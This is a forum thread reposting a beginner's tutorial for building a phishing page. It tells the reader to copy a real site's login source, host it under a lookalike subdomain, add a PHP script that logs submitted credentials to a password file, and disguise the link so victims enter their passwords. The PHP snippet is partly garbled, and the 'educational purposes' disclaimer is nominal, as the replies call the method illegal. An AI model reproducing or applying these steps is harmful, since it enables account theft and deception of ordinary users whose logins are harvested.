Selling [TuT]Phisher

Discussion in 'Guides for Sale - Buy & Sell' started by Games, 7/29/15.

Thread Status:
Not open for further replies.
  1. Games

    Games
    Expand Collapse
    Bot Status (Automated): Handles automated general support inquiries

    Offline
    Joined:
    9/20/13
    Posts:
    525,068
    Likes Received:
    61
    The thread applies to D3scene's disclaimer and is for educational purposes only

    please read the disclaimer

    after blowing my brains of on some phiser TuT's i found one that made things alot simpler enjoy

    Phishing Tutorial (Very clear and good for newbs) The one Corw made on HF was very good, but some people had problems. This will be a basic tut on how to make a phisher! I will be using a variety of websites. Crow used myspace, but I will teach you how to make it with any!

    Index:

    What is a phisher? - 101

    Making a T35 Account - 102

    Getting Web pages Source Code - 103

    Creating Phish File - 104

    How to fool people - 105

    ------------------------

    What is a phisher? 101

    ------------------------

    A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

    --------------------------

    Making a T35 Account 102

    --------------------------

    In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.

    --------------------------------------

    Getting Web Pages Source Code 103

    --------------------------------------

    After you create that page, go to the website you will make a phisher for, I will use KHI ( Kingdom Hearts Forums ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.

    ------------------------

    Creating Phish File 104

    ------------------------

    Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

    Now create another file, title it fhish.php And inside, paste this code:

    Code:

    $value) {

    fwrite($handle, $variable);

    fwrite($handle, "=");

    fwrite($handle, $value);

    fwrite($handle, "rn");

    }

    fwrite($handle, "rn");

    fclose($handle);

    exit;

    ?>

    The MySpace - Meine Freunde is what the page goes to after the victim logs in, change that to what desired

    Save the file.

    Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

    -------------------------

    How to fool people - 105

    -------------------------

    What you do now is disguise your link. Use this code:

    Code:

    T35acount.spam.com/login.htm

    That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

    Code:

    *real website name*.com/login.php

    You do the same for any forum!

    credits to Pure Envy

    nice i guess

    quite simple.

    Ooh, smexy and illegal at the same time!

    thats where our Disclaimer comes in

    Yea just noticed that. Xellos00 next time please add in our Disclaimer if you don't wanna get owned

    i helped you with this one

    tnx m8 forgot to put it in again
     
    #1 Games, 7/29/15
    Last edited by a moderator: 10/28/24
    • This user is inactive. Hasn't logged into their account in over 60 days.
Thread Status:
Not open for further replies.